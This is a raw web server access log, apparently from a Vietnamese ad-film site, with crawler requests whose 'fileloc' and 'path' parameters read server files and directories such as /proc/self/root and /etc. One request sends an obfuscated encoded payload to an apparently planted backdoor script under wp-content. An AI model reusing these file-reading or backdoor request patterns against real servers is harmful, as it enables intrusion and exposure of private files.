216.73.216.50 - - [09/Nov/2025:01:13:32 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Funittest%2Fsignals.py&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Funittest HTTP/1.0" 200 3600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:32 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fnet%2Fethernet%2Fapple%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fnet%2Fethernet%2Fapple HTTP/1.0" 200 3792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.19.221.48 - - [09/Nov/2025:01:13:32 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/vc/vcsa1 HTTP/1.0" 200 3303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:13:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory5 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:33 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fplugins%2Fcred_anonymous.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fplugins HTTP/1.0" 200 3312 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:33 +0000] "GET /q-~42Go7TLEWWz9q7KgQDDl0mETBjCyoKMd46027/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:34 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fmips%2Finclude%2Fasm%2Fsn%2Fnmi.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fmips%2Finclude%2Fasm%2Fsn HTTP/1.0" 200 4270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:34 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fasyncio%2Ftasks.py&path=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fasyncio HTTP/1.0" 200 11572 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:34 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fpragmarx%2Fgoogle2fa-qrcode%2Fsrc%2FGoogle2FA.php&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fpragmarx%2Fgoogle2fa-qrcode%2Fsrc HTTP/1.0" 200 3653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory6 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:35 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fxml%2Fsax%2Fsaxutils.py&path=%2F%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fxml%2Fsax HTTP/1.0" 200 6031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:35 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fhamcrest%2Flibrary%2Fcollection%2Fissequence_containing.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fhamcrest%2Flibrary%2Fcollection HTTP/1.0" 200 3864 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:35 +0000] "GET /q-~280Ruc3hqxbsHIyDjImOzqgC5MCODXzCL48931/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:36 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fversionpredicate.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 4645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:36 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fum%2Finclude%2Fasm%2Fcache.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fum%2Finclude%2Fasm HTTP/1.0" 200 3137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:36 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fi3c%2Fdevice.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fi3c HTTP/1.0" 200 6239 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:37 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm%2Fproc-fns.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 3280 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory9 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.84.161.62 - - [09/Nov/2025:01:13:37 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/devices/breakpoint/power HTTP/1.0" 200 3477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:13:37 +0000] "GET /q-~69uIvQarOAd0ngGmASYVqPxCPv2F9yks45006/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:38 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2FDistUpgradeViewKDE.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 14463 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:38 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fdtc%2Finclude-prefixes%2Fdt-bindings%2Fmemory HTTP/1.0" 200 3589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:38 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fpexpect%2Fexpect.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fpexpect HTTP/1.0" 200 5543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:38 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fasyncio%2Ftasks.py&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fasyncio HTTP/1.0" 200 11557 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory2 HTTP/1.0" 200 3615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:39 +0000] "GET /q-~291CCR2aIhuSOxVVx4ijFwdkpDKcbKicd35044/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:39 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__%2Fqueues.cpython-38.pyc&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__ HTTP/1.0" 200 2901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fnet%2Fhyperv%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fnet%2Fhyperv HTTP/1.0" 200 3030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fsensors%2Fibmpex.h&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fsensors HTTP/1.0" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fext%2Fpdo%2Fphp_pdo_driver.h&path=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fext%2Fpdo HTTP/1.0" 200 11313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:40 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory7 HTTP/1.0" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.236.135.14 - - [09/Nov/2025:01:13:41 +0000] "GET /our-works/tvc-kimino/?path=//var/lib/vim/addons HTTP/1.0" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:13:41 +0000] "GET /q-~64s4IQoSXNOc0z0GLKiuSSzbaqtNxrWo31569/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:42 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Fdrm%2Fttm%2Fttm_placement.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Fdrm%2Fttm HTTP/1.0" 200 4387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:42 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit%2F__init__.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit HTTP/1.0" 200 2894 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:42 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc%2Fof_table.cocci&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc HTTP/1.0" 200 3328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:42 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2Ftelemetry.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 4265 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory4 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:43 +0000] "GET /q-~212naqgTrVXFvIAl8RjXOQCREFaCZa6tM11795/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:44 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fi3c%2Fmaster.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fi3c HTTP/1.0" 200 10097 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
207.46.13.18 - - [09/Nov/2025:01:13:43 +0000] "GET /?products=1636901790 HTTP/1.0" 200 25969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:44 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fpastebin.d%2Fpaste.pound-python.org.conf&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fpastebin.d HTTP/1.0" 200 2949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:44 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fgi%2Fpygtkcompat.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fgi HTTP/1.0" 200 3096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:45 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fweb-auth%2Fmetadata-service%2Fsrc%2FVersion.php&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fweb-auth%2Fmetadata-service%2Fsrc HTTP/1.0" 200 3664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.52 - - [09/Nov/2025:01:13:45 +0000] "GET /?products=300848358 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:13:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/cpu1 HTTP/1.0" 200 3686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:46 +0000] "GET /q-~75jbzDLwEK7T1dILEWrmoIkqHfGFlg9L39572/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.147.80.137 - - [09/Nov/2025:01:13:46 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//etc/logrotate.d/cloud-init&path=//etc/logrotate.d HTTP/1.0" 200 2901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:46 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Framsey%2Fuuid%2Fsrc%2FNonstandard%2FUuidBuilder.php&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Framsey%2Fuuid%2Fsrc%2FNonstandard HTTP/1.0" 200 3707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:47 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fxtensa%2Finclude%2Fasm%2FKbuild&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fxtensa%2Finclude%2Fasm HTTP/1.0" 200 3145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:47 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm%2Fcacheflush.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 3479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:48 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FCommandNotFound%2FCommandNotFound.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FCommandNotFound HTTP/1.0" 200 6958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:01:11:26 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635343238362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303638362q6430313434643935663434663061623132623663316637656363613033343431222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
40.77.167.52 - - [09/Nov/2025:01:13:48 +0000] "GET /?products=238199074 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:13:49 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/power/async&path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/power HTTP/1.0" 200 2903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:49 +0000] "GET /q-~169osQy8vKZezmfgqNmyZaspihxkTT2Rb27286/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:49 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fperl5%2FHTML%2FTemplate.pm&path=%2F%2Fusr%2Fshare%2Fperl5%2FHTML HTTP/1.0" 200 37180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:50 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fum%2Finclude%2Fasm%2Fpgtable.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fum%2Finclude%2Fasm HTTP/1.0" 200 5914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.207.252.58 - - [09/Nov/2025:01:13:50 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//usr/lib/apt HTTP/1.0" 200 3348 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:51 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Finclude%2Fconfig%2Fstacktrace HTTP/1.0" 200 3206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:51 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Furllib3%2Futil%2Frequest.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Furllib3%2Futil HTTP/1.0" 200 4254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory5 HTTP/1.0" 200 3611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:52 +0000] "GET /q-~232DvuofuySChhwNWCb5TPrD8Au1FRcJN6543/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:52 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fsamples%2Frpmsg%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fsamples%2Frpmsg HTTP/1.0" 200 2950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:52 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fnacl%2Fexceptions.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fnacl HTTP/1.0" 200 3791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
